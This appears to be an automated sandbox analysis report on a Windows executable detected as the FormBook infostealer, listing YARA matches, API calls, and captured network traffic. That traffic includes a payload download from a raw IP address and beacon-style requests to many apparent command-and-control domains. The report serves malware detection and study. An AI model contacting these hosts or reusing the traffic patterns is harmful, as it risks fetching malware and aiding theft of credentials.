Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000003.3115928229.000000000D778000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000002.7485227128.000000001416F000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.laposadaapts.com/ms12/?hT=vo99NxIlv9atltQAf5

Source: unknown

DNS traffic detected: queries for: 97.97.242.52.in-addr.arpa

Source: global traffic	HTTP traffic detected: GET /CsPlxqjFa224.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.133.40.46Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2// HTTP/1.1Host: www.paparazirestaurant.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.eliteequinewellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb HTTP/1.1Host: www.economjchq.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.friendsofquarepianos.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.arialttnr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.garageautosaintthomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy HTTP/1.1Host: www.hospitalityhsia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT HTTP/1.1Host: www.drugtestingservices.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap HTTP/1.1Host: www.amyjohnsonrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.lists-cellphones.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.findyellowfreightjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.conscienciaretroprogresiva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.triknblog.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FE3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: SC.028UCCP.exe PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: SC.028UCCP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.7446412536.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.7445956463.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.7461101436.000000000AD28000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2969631128.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: SC.028UCCP.exe PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040310B

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00404822	0_2_00404822
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_004062C3	0_2_004062C3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00406A9A	0_2_00406A9A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECD480	6_2_34ECD480
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F175C6	6_2_34F175C6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1F5C9	6_2_34F1F5C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2A526	6_2_34F2A526
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED36EC	6_2_34ED36EC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5C6E0	6_2_34E5C6E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1F6F6	6_2_34F1F6F6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1A6C0	6_2_34F1A6C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E84670	6_2_34E84670
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0D646	6_2_34F0D646
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFD62C	6_2_34EFD62C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7C600	6_2_34E7C600
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E62760	6_2_34E62760
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6A760	6_2_34E6A760
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F16757	6_2_34F16757
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F170F1	6_2_34F170F1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6B0D0	6_2_34E6B0D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E500A0	6_2_34E500A0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E9508C	6_2_34E9508C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0E076	6_2_34F0E076
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B1E0	6_2_34E7B1E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E651C0	6_2_34E651C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EA717A	6_2_34EA717A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFD130	6_2_34EFD130
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F113	6_2_34E4F113
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2010E	6_2_34F2010E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D2EC	6_2_34E4D2EC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E22245	6_2_34E22245
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1124C	6_2_34F1124C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E51380	6_2_34E51380
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1F330	6_2_34F1F330
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6E310	6_2_34E6E310
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7FCE0	6_2_34E7FCE0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2ACEB	6_2_34F2ACEB
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E78CDF	6_2_34E78CDF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EF9C98	6_2_34EF9C98
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E63C60	6_2_34E63C60
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1EC60	6_2_34F1EC60
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F16C69	6_2_34F16C69
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0EC4C	6_2_34F0EC4C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6AC20	6_2_34E6AC20
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E50C12	6_2_34E50C12
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFFDF4	6_2_34EFFDF4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E69DD0	6_2_34E69DD0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E72DB0	6_2_34E72DB0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60D69	6_2_34E60D69
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F17D4C	6_2_34F17D4C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1FD27	6_2_34F1FD27
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5AD00	6_2_34E5AD00
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E52EE8	6_2_34E52EE8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F19ED2	6_2_34F19ED2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E61EB2	6_2_34E61EB2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F10EAD	6_2_34F10EAD
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F00E6D	6_2_34F00E6D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EA2E48	6_2_34EA2E48
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E80E50	6_2_34E80E50
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E66FE0	6_2_34E66FE0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F11FC6	6_2_34F11FC6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1EFBF	6_2_34F1EFBF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1FF63	6_2_34F1FF63
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6CF00	6_2_34E6CF00
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F178F3	6_2_34F178F3
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E628C0	6_2_34E628C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F118DA	6_2_34F118DA
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED98B2	6_2_34ED98B2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E76882	6_2_34E76882
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1F872	6_2_34F1F872
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E46868	6_2_34E46868
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E69870	6_2_34E69870
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7B870	6_2_34E7B870
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F00835	6_2_34F00835
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E63800	6_2_34E63800
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E810	6_2_34E8E810
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E299E8	6_2_34E299E8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EA59C0	6_2_34EA59C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5E9A0	6_2_34E5E9A0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1E9A6	6_2_34F1E9A6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7FAA0	6_2_34E7FAA0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1FA89	6_2_34F1FA89

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: String function: 34E4B910 appears 245 times
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: String function: 34EDEF10 appears 102 times
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: String function: 34ECE692 appears 81 times
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: String function: 34EA7BE4 appears 78 times

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92CF0 NtDelayExecution,LdrInitializeThunk,	6_2_34E92CF0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92C50 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_34E92C50
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92C30 NtMapViewOfSection,LdrInitializeThunk,	6_2_34E92C30
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_34E92DC0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92DA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_34E92DA0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92D10 NtQuerySystemInformation,LdrInitializeThunk,	6_2_34E92D10
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92ED0 NtResumeThread,LdrInitializeThunk,	6_2_34E92ED0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92EB0 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_34E92EB0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92E50 NtCreateSection,LdrInitializeThunk,	6_2_34E92E50
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92F00 NtCreateFile,LdrInitializeThunk,	6_2_34E92F00
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E929F0 NtReadFile,LdrInitializeThunk,	6_2_34E929F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92A80 NtClose,LdrInitializeThunk,	6_2_34E92A80
